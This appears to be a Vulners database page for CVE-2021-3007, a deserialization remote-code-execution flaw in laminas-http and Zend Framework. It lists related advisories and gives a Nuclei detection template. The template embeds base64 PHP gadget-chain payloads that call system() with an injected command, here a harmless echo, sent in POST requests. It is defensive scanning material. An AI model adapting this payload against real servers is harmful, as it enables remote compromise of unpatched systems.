| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| Exploit for Deserialization of Untrusted Data in Getlaminas Laminas-Http | 5 Dec 202508:35 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Getlaminas Laminas-Http | 5 Dec 202510:43 | – | githubexploit | |
| CVE-2021-3007 | 4 Jan 202103:15 | – | attackerkb | |
| CVE-2020-7961 | 20 Mar 202000:00 | – | attackerkb | |
| CVE-2021-3007 | 4 Jan 202107:36 | – | circl | |
| Laminas Project laminas-http and Zend Framework Code Issues Vulnerabilities | 3 Jan 202100:00 | – | cnnvd | |
| MK-AUTH Cross-Site Request Forgery Vulnerability | 8 Jan 202100:00 | – | cnvd | |
| Zend Framework Remote Code Execution (CVE-2021-3007) | 17 Jan 202100:00 | – | checkpoint_advisories | |
| CVE-2021-3007 | 4 Jan 202102:26 | – | cve | |
| CVE-2021-3007 | 4 Jan 202102:26 | – | cvelist |
id: CVE-2021-3007
info:
name: Laminas Project laminas-http - Remote Code Execution
author: 0xanis
severity: critical
description: |
Laminas Project laminas-http < 2.14.2 and Zend Framework 3.0.0 contain a deserialization vulnerability caused by __destruct method in Zend\\Http\\Response\\Stream, letting attackers control content lead to remote code execution, exploit requires attacker-controlled serialized data.
impact: |
Attackers can execute arbitrary code remotely by controlling serialized content during deserialization.
remediation: |
Update to laminas-http 2.14.2 or later; note that Zend Framework is no longer supported.
reference:
- https://github.com/Ling-Yizhou/zendframework3-/blob/main/zend%20framework3%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%20rce.md
- https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-3007
cwe-id: CWE-502
epss-score: 0.75313
epss-percentile: 0.99455
cpe: cpe:2.3:a:getlaminas:laminas-http:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: getlaminas
product: laminas-http
shodan-query: http.html:"laminas"
tags: cve,cve2021,laminas,zend,rce,deserialization,vkev
flow: http(1) || http(2)
variables:
rand: "{{to_lower(rand_base(5))}}"
cmd: "echo {{rand}}"
param: "hello"
cmd_len: "{{len(cmd)}}"
laminas_base_payload: "TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjc6InBocGluZm8iO319fXM6MTM6IgAqAGF0dHJpYnV0ZXMiO2E6MTp7"
zend_base_payload: "TzoyNToiWmVuZFxIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086MjU6IlplbmRcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMDoiWmVuZFxWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQxOiIAWmVuZFxWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoxODoiWmVuZFxDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjc6InBocGluZm8iO319fXM6MTM6IgAqAGF0dHJpYnV0ZXMiO2E6MTp7"
laminas_cmd_part: '{{base64("s:" + cmd_len + ":\"" + cmd + "\";i:1;}}}")}}'
zend_cmd_part: '{{base64("s:" + cmd_len + ":\"" + cmd + "\";i:1;}}}")}}'
laminas_payload: "{{laminas_base_payload}}{{laminas_cmd_part}}"
zend_payload: "{{zend_base_payload}}{{zend_cmd_part}}"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{param}}={{laminas_payload}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "laminas", "{{rand}}")'
- 'status_code == 200'
condition: and
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{param}}={{zend_payload}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "zend", "{{rand}}")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100aa081df852044c529120b52323efbf1a789ff445575117ceedf0295d59560ab1022100881c0cac4ccecd00cfbf3f11fea1fca04338b9d6c8ef9e0ecf5f558d48dfcb67:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation